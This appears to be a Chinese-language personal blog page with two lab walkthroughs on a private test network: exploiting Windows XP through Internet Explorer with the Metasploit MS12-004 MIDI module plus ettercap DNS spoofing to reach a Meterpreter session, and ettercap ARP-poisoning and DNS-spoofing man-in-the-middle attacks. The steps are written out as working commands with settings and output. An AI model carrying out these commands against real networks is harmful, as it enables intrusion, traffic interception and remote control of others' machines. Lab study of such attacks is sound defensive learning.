2013年11月15日星期五

MS12_004局域网入侵模拟实验

环境:
     攻击主机bt5    IP 192.168.29.134
     目标主机xpsp3  IP 192.168.29.135
     网关            IP 192.168.29.254


1.   use exploit/windows/browser/ms12_004_midi
2.   show targets

   Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 6 on Windows XP SP3
   2   IE 7 on Windows XP SP3
   3   IE 8 on Windows XP SP3 with JRE ROP
   4   IE 8 on Windows XP SP3 with msvcrt


3.   info

    
4.  show options
    Module options (exploit/windows/browser/ms12_004_midi):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
 

5.  set SRVHOST 192.168.29.134
6.  set SRVPORT 80

7   set URIPATH /   

8.  exploit -j

9.  局域网DNS欺骗
  ettercap -T -Q -i eth0 -M arp -P dns_spoof // //




xp上用ie打开浏览器访问网页后


10. session -i
   session -i 1
11 进入meterpreter
   meterpreter > sysinfo
   Computer        : FRANK-34C8YW2BE
   OS              : Windows XP (Build 2600, Service Pack 1).
   Architecture    : x86
   System Language : en_US
   Meterpreter     : x86/win32

12.     查看使用命令

13  screenshot   截取远程桌面



Read more »

欺骗攻击工具 Ettercap 的模拟实验

使用ettercap实现局域网arp欺骗+中间人攻击
环境
网关           ip: 192.168.29.254    mac:  00:50:56:F3:72:9A
攻击主机bt5    ip: 192.168.29.134  mac:  00:0c:29:3e:85:e3
目标主机xp     ip: 192.168.29.135 
目标主机arp初始缓存表



1.打开/etc/etter.conf文件去掉相应注释信息

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

  使用  iptables  ip转发规则
2.执行echo 1 > /proc/sys/net/ipv4/ip_forward
  开启iptables转发规则 防止被欺骗主机无法访问互联网

3.ettercap  -G

sniff-----unified sniffing 配置网卡
host----scan for host 扫描局域网那个主机
    ---hosts list     列出主机

目标主机添加到  Target1
网关    添加到   Target2

Mitm---arp poisoning----sniff remote connections

开始arp欺骗

目标主机新的arp缓存表

网关的mac地址变成攻击主机134mac地址

此时依旧能上网


欺骗成功! 

然后开始嗅探 

嗅探攻击成功!
mitm ----stop mitm attack
start---stop sniffing


使用ettercap实现局域网dns欺骗
环境
网关           ip: 192.168.29.254    mac:  00:50:56:F3:72:9A
攻击主机bt5    ip: 192.168.29.134  mac:  00:0c:29:3e:85:e3
目标主机xp     ip: 192.168.29.135 

1.修改etter.dns文件
/usr/local/share/ettercap/etter.dns


目标主机初始状态

ettercap  -T  -q  -i  eth1 -P  dns_spoof  //  //
DNS欺骗整个网络后

ok成功!
先做arp欺骗再做DNS  欺骗会更好 
ettercap  -T -Q  -i  eth0  -M arp  -P -dns_spoof // //




Read more »
Blogger 提供支持.

This is me

© Manuel